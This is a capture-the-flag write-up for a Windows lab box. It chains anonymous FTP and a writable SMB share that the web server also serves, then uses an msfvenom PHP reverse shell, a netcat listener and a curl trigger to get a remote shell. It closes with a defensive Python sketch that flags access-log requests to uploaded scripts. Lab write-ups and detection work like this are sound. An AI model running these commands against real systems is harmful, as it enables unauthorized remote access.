
# AllSignsPoint2Pwnage (WIP)

## Nmap

```
sudo nmap 10.10.54.102 -p- -sS -sV -Pn

Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5040/tcp  open  unknown
5900/tcp  open  vnc           VNC (protocol 3.8)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

First up, checking FTP shows that anonymous login is allowed. Listing the contents shows only notice.txt.

![](/files/-MY03YPufw4u6qNY7UEg)

Viewing the contents, we become aware of a hidden SMB share called 'images'. The notice also implies that uploading to the share is possible.

![](/files/-MY03fKGJHajhcw8-vgE)

Checking for shares with smbclient.

```
smbclient -U '' -L \\\\10.10.54.102\\
```

![](/files/-MY04skATH5uliIDnww9)

We can then connect to the images$ share, list the contents and confirm file upload with the `put` command using test.txt.

![](/files/-MY053MOdaFP_dng6TjD)

Browsing to port 80 to check out the web server, we are presented with a slideshow. Using the context menu to save the images shows us the image names, which match those in the SMB share.

![](/files/-MY05qW1qC8OhMGF5_PM)

We can test whether the contents of test.txt are readable over HTTP, to confirm that files uploaded to the share are served by the web server and can therefore be executed. We try the /images/ directory, as we know the share exists.

```
curl http://10.10.54.102/images/test.txt 
```

![](/files/-MY06FYpAEJLEeaWGUA4)

Knowing this works, we can start to work towards getting a reverse shell. Checking the web server with Nikto shows it is powered by PHP.

![](/files/-MY06UYOXAEk1zf4WcCP)

Ideally we should create a PHP reverse shell and upload it to the SMB share. We can achieve this with msfvenom as shown below.

```
msfvenom -p php/reverse_php LHOST=10.14.3.108 LPORT=80 -f raw > phpreverseshell.php
```

Then upload the shell to the SMB share.

![](/files/-MY06w3ulIwpSCkqA3yq)

Open a `netcat` listener on the port specified in the payload.

```
sudo nc -lvp 80
```

Then execute the shell with curl.

```
curl http://10.10.54.102/images/phpreverseshell.php
```

This connects back to our listener.

![](/files/-MY07_q6nhrEkFOlSQ7f)
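
The chain above works because a directory that is writable over SMB is also served by a PHP-enabled Apache. As an added example (not part of the original write-up), the Python sketch below scans Apache access-log lines for requests to script files under `/images/`; the log lines, client addresses and extension list are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

UPLOAD_PREFIX = "/images/"  # web path backed by the writable share (from the write-up)
SCRIPT_EXT = (".php", ".phtml", ".phar")  # assumed list of handler-mapped extensions

# Apache common/combined log line: host ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (not taken from the host in the write-up).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2021:10:00:00 +0000] "GET /images/test.txt HTTP/1.1" 200 5',
    '203.0.113.7 - - [01/Jan/2021:10:05:00 +0000] "GET /images/phpreverseshell.php HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2021:10:06:00 +0000] "GET /Images/Shell.PHP?x=1 HTTP/1.1" 403 199',
    '203.0.113.9 - - [01/Jan/2021:10:07:00 +0000] "GET /images/%70ic.php/extra HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Jan/2021:10:08:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

def script_in_upload_dir(target):
    """Return the normalised script path if target names a script under UPLOAD_PREFIX."""
    # Drop the query string, percent-decode, and fold case (Windows paths ignore case).
    path = unquote(target.split("?", 1)[0]).replace("\\", "/").lower()
    path = posixpath.normpath(re.sub(r"/+", "/", path))
    if not path.startswith(UPLOAD_PREFIX):
        return None
    # Check every segment so PATH_INFO forms (/images/a.php/extra) are caught.
    parts = path.split("/")
    for i, seg in enumerate(parts):
        if seg.endswith(SCRIPT_EXT):
            return "/".join(parts[: i + 1])
    return None

def find_hits(lines):
    """Return (client, script, status, served) for each request to an uploaded script."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        script = script_in_upload_dir(m["target"])
        if script is not None:
            status = int(m["status"])
            hits.append((m["host"], script, status, 200 <= status < 300))
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE):
        print(hit)
```

A hit with a 2xx status means the server answered a request for a script inside the upload directory, which is the condition to alert on and to remove by disabling script handling for that directory.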

